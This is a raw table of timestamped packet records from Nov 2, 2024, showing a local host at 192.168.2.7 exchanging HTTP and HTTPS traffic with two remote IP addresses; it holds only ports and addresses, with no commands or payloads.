Nov 2, 2024 17:56:23.771895885 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.771903992 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.774295092 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774353981 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774367094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774379969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774430990 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774430990 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774477959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774492025 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774518967 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774532080 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774703026 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774754047 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774787903 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774801016 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774832964 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774844885 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.774894953 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.774936914 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.775285959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.775332928 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.775345087 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.775357008 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.775382996 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.775397062 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.775473118 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.775516987 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.778196096 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.778557062 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.778567076 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.778925896 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.778932095 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.797117949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.797136068 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.797183037 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.797225952 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.882649899 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.882826090 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.882898092 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.883007050 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.883027077 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.883038044 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.883044958 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.886182070 CET	49706	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.886212111 CET	443	49706	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.886308908 CET	49706	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.886482000 CET	49706	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.886497021 CET	443	49706	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.889785051 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.889801025 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.889861107 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.889882088 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.889899969 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.889923096 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.889949083 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.890083075 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.890096903 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.890105009 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.890110016 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.891731977 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.891746998 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.891758919 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.891810894 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.891840935 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.891845942 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.891884089 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.891901016 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.891941071 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892105103 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892158031 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892184973 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892198086 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892229080 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892281055 CET	49707	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.892302990 CET	443	49707	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.892365932 CET	49707	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.892379999 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892429113 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892450094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892498016 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892555952 CET	49707	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.892568111 CET	443	49707	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.892894983 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892942905 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.892975092 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.892987013 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.893026114 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.893048048 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.893094063 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.894089937 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.894150972 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.894196033 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.894300938 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.894309044 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.894319057 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.894324064 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.896306038 CET	49708	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.896343946 CET	443	49708	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.896425962 CET	49708	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.896564007 CET	49708	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.896578074 CET	443	49708	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.909759998 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.909809113 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.909858942 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.909878969 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.909918070 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.909960985 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.910037994 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.910047054 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.910057068 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.910062075 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.912043095 CET	49709	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.912067890 CET	443	49709	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.912136078 CET	49709	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.912249088 CET	49709	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.912261009 CET	443	49709	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.923629045 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.923707962 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.923751116 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.923798084 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.926637888 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.926664114 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.926728010 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.926740885 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.926764011 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.926783085 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.926811934 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.926899910 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.926908970 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.926918030 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.926922083 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.929115057 CET	49710	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.929131985 CET	443	49710	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.929218054 CET	49710	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.929371119 CET	49710	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.929380894 CET	443	49710	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:24.008944988 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009026051 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009037971 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009040117 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009071112 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009094954 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009227037 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009273052 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009305000 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009319067 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009356022 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009387016 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009398937 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009435892 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.009584904 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009598017 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.009634018 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.010204077 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.010224104 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.010252953 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.010279894 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.010310888 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.010323048 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.010359049 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.041394949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.041515112 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.041541100 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.041557074 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.041613102 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.126816034 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.126851082 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.126866102 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.126934052 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.126952887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.126990080 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127003908 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127031088 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127057076 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127087116 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127140999 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127279997 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127331018 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127361059 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127372980 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127407074 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127418995 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127443075 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127495050 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127748013 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127830029 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127842903 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127854109 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.127896070 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.127908945 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.158876896 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.158917904 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.158930063 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.158973932 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.158997059 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.159022093 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.159068108 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.243678093 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243691921 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243704081 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243768930 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.243791103 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243803024 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243813992 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243827105 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.243834019 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.243864059 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.244016886 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.244029045 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.244070053 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.244692087 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.244710922 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.244723082 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.244744062 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.244781971 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.275859118 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.275881052 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.275895119 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.275922060 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.275949955 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.276026011 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.276072025 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.276195049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.276242971 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.276441097 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.276487112 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.360598087 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.360640049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.360651970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.360701084 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.360732079 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361104965 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361114979 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361125946 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361156940 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361160040 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361171007 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361185074 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361196041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361208916 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361211061 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361229897 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361258984 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.361428022 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.361475945 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.362030983 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.362082958 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.362082958 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.362096071 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.362123013 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.362137079 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.393337011 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.393379927 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.393393040 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.393445969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.393469095 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.393553019 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.393563986 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.393595934 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.393637896 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.477885962 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.477921009 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.477933884 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478003025 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478043079 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478292942 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478332996 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478368998 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478383064 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478410006 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478427887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478543997 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478557110 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478591919 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478610992 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478800058 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478816986 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478853941 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478869915 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.478883028 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478899002 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.478945971 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.479310989 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.479392052 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.479441881 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.479448080 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.479496956 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.511039972 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511058092 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511070967 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511188030 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.511317015 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511337996 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511372089 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.511394978 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.511677027 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511691093 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.511734009 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595264912 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595333099 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595391035 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595405102 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595418930 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595438004 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595480919 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595731020 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595777035 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595850945 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595863104 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595874071 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.595891953 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.595912933 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.596155882 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596167088 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596178055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596204996 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.596234083 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.596259117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596270084 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596282005 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.596302032 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.596329927 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.627731085 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.627772093 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.627785921 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.627794027 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.627810955 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.627830029 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.628230095 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.628245115 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.628277063 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.628299952 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.628323078 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.628334045 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.628346920 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:24.628367901 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.628412008 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:24.653302908 CET	443	49708	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:24.654048920 CET	49708	443	192.168.2.7	13.107.246.45
